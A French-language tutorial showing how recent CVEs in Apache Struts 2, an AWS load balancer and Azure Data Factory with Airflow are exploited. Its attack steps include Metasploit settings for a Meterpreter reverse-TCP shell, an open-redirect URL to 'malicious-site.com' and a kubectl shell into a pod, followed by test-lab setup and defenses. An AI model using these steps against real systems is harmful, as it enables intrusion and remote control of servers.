Exploitation des Dernières CVE sur Apache, AWS et Azure avec Metasploit 🛠️
Comprendre comment les attaquants exploitent des vulnérabilités récentes (CVE) sur Apache, AWS et Azure pour compromettre des systèmes critiques. Nous inclurons l’utilisation de Metasploit, des scripts Python, et des configurations d’environnements de test. Enfin, nous aborderons les mesures de défense à adopter pour sécuriser ces infrastructures.
Vulnérabilités Ciblées :
- Apache Struts 2 (CVE-2024-53677)
- Description : Vulnérabilité d'exécution de code à distance (RCE) via le mécanisme de téléchargement de fichiers.
- Score CVSS : 9.5 (Critique)
- Impact : Compromission complète d'un serveur Apache Struts.
- AWS Application Load Balancer (ALB)
- Description : Faible configuration de l’authentification, permettant de contourner les restrictions d’accès.
- Impact : Compromission des API, fuite de données sensibles.
- Azure Data Factory avec Apache Airflow
- Description : Failles dans les permissions Kubernetes RBAC permettant une prise de contrĂ´le.
- Impact : Exfiltration des données et compromission des pipelines de données.
Partie 1 : Attaques
Étape 1 : Exploitation d’Apache Struts 2 avec Metasploit
msfconsole
Chargement du module pour CVE-2024-53677 :
search struts2
Configuration des paramètres :
set RHOSTS
set RPORT 8080
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST
set LPORT 4444
Lancer l’attaque :
exploit
Étape 2 : Contournement AWS ALB avec Burp Suite
Configurez Burp Suite pour intercepter une requête vers un ALB vulnérable. Modifiez l’URL de redirection :
https:///login?redirect_uri=//malicious-site.com
Étape 3 : Compromission Azure Data Factory via Kubernetes RBAC
Exploration des permissions RBAC :
kubectl get clusterroles
Exécution de commandes malveillantes :
kubectl exec -it pod/airflow-pod -- /bin/bash
Partie 2 : Déploiement d’Environnements de Test
- Apache Struts 2 :
docker run -d -p 8080:8080 vulhub/struts2:CVE-2024-53677 - AWS ALB : Configurez une instance EC2 avec un ALB minimal.
- Azure Data Factory :
minikube start --nodes 3 helm repo add apache-airflow https://airflow.apache.org helm install airflow apache-airflow/airflow
Partie 3 : Défenses
Apache Struts 2
- Correctifs : Mettez à jour vers une version corrigée dès que possible.
- WAF : Configurez un Web Application Firewall.
- Analyse continue : Utilisez OWASP Dependency-Check.
AWS ALB
- Configuration stricte : Restreignez les URI de redirection.
- Journalisation : Activez AWS CloudTrail.
Azure Data Factory
- RBAC sécurisé : Implémentez le principe du moindre privilège.
- Surveillance : Activez Azure Monitor.
Conclusion
Ce tutoriel fournit une approche exhaustive pour comprendre et tester les vulnérabilités récentes sur Apache, AWS et Azure, tout en explorant les méthodes d'attaque et les contre-mesures.